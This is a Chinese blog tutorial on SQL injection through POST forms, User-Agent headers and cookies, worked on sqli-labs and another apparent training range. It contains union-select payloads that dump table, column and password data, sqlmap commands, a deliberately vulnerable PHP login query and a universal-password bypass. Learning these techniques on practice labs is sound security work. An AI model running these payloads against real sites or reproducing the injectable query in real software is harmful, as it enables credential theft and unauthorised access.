飞道的博客

web安全sql注入HTTP头&Post&Cookie注入

384人阅读  评论(0)

先附上一段PHP代码,了解一下基本原理

<?php
header("Content-Type: text/html; charset=utf-8");

$get=$_GET['g'];
$post=$_POST['p'];
$cookie=$_COOKIE['c'];
$request=$_REQUEST['r'];
$host=$_SERVER['HTTP_HOST'];
$user_agent=$_SERVER["HTTP_USER_AGENT"];
$ip=$_SERVER["HTTP_X_FORWARDED_FOR"];

echo $get."<hr>";
echo $post."<hr>";
echo $cookie."<hr>";
echo $request."<hr>";
echo $host."<hr>";
echo $user_agent."<hr>";
echo $ip;
?>
1.$get=$_GET['g']; //接受GET传递的值赋值给变量

2.$post=$_POST['p']; //接受POST传递的值赋值给变量

3.$cookie=$_COOKIE['c']; //接受COOKIE传递的值赋值给变量

4.$request=$_REQUEST['r']; //全部接受或部分传递的值赋值给变量
php中$_REQUEST、$_POST、$_GET的区别:https://www.cnblogs.com/angel648/p/11059220.html
数据传输讲究数据传输的方式
$_REQUEST["参数"]具用$_POST["参数"] $_GET["参数"]的功能,但是$_REQUEST["参数"]比较慢
通过post和get方法提交的所有数据都可以通过$_REQUEST数组["参数"]获得




post和get传参可行,cookie传参就不行

5.$host=$_SERVER['HTTP_HOST']; //接受访问数据包中的host值赋值给变量

6.$user_agent=$_SERVER["HTTP_USER_AGENT"]; //接受访问数据包中的浏览器信息值赋值给变量

7.$ip=$_SERVER["HTTP_X_FORWARDED_FOR"]; //接受访问数据包中的IP数据信息值赋值给变量

利用应用场景-提交方式&接受信息
场景1:常见登录数据请求方法
场景2:常见访问者来源IP判断
场景3:常见访问者浏览器信息判断

参考:https://www.w3school.com.cn/php/php_superglobals.asp
           https://www.cnblogs.com/lushaoyan/p/11088213.html
           https://www.cnblogs.com/zhao-/p/10994615.html

SQL注入-POST注入

这里使用的Sqli-LABS靶场Less-11,打开是一个登陆界面,在登录框admin后面加单引号把它带入数据库让它报错


然后直接联合查询测试

admin%27 and 1=2 union select database(),version()
database()  //查看数据库
version() //查看版本

爆表:admin' and 1=2 union select 1,group_concat(table_name) from 
information_schema.tables where table_schema='security' --+

表:emails,referers,uagents,users

爆列名:admin' and 1=2 union select 1,group_concat(column_name) from 
information_schema.columns where table_name='users' --+

列名:user_id,first_name,last_name,user,password,
avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,
TOTAL_CONNECTIONS,id,username,password

爆数据:admin' and 1=2 union select  1,group_concat(username,password) from users --+


sqlmap post注入

python sqlmap.py -u “http://sqli-labs-master:100/Less-11/index.php” --data “uname=123&passwd=213&submit=Submit”

python sqlmap.py -u “http://sqli-labs-master:100/Less-11/index.php” --data “uname=123&passwd=213&submit=Submit” --current-db


sqlmap post请求数据包注入

把burp数据复制粘贴到txt记事本里面

python sqlmap.py -r post.txt

python sqlmap.py -r post.txt --current-db


那么post请求数据包注入的优点就是它会根据你burp抓包的真实数据来进行注入 --data的话就是自带sqlmap的请求数据包

sql万能密码注入

漏洞代码
$user = $_POST[ 'username' ]; //接受用户输入的账号
$pass = $_POST[ 'password' ]; //接受用户输入的密码
$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

如果让用户传递数据 $user = ’ or ‘1’='1
sql语句就变成

SELECT * FROM `users` WHERE user = ' ' or '1'='1' AND password = '$pass';

那么 and_真和真=真 真和假=假 or_真或真=真 真或假=真
这里 ‘1’=‘1’ 为真 就构成了一个永真 ,or永远为真 后面再构造一个#注释掉 and后面的就变成
SELECT * FROM users WHERE user = ’ ’ or ‘1’=‘1’ # //真 就能进入后台

SQL注入-HTTP头注入

这里使用的Sqli-LABS靶场Less-18,注入点在UA头上,但是尝试在X-Forwarded-For上修改ip没有反应说明不存在注入

那么抓包在UA头上输入单引号看有报错说明带入了数据库,存在注入

参考:https://blog.csdn.net/devilare/article/details/112764661
由于考虑要用报错注入,我直接丢sqlmap一把梭

python sqlmap.py -r UA.txt --level 3 --current-db

SQL注入-Cookie注入

这里用的是掌控安全的靶场,环境可能是Access数据库+Asp脚本语言的组合
靶场:http://59.63.200.79:8004/

那么把后面的参数去掉,数据库报错说明存在注入

直接order by 10 正常,说明存在10列,这里经过测试一般的注入参数被过滤,只有尝试cookie注入,使用工具ModHeader

联合查询看是否存在admin表

存在admin表,爆字段 id=172+union+select+1,password,username,4,5,6,7,8,9,10+from+admin



转载:https://blog.csdn.net/qq_36241198/article/details/116402880
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场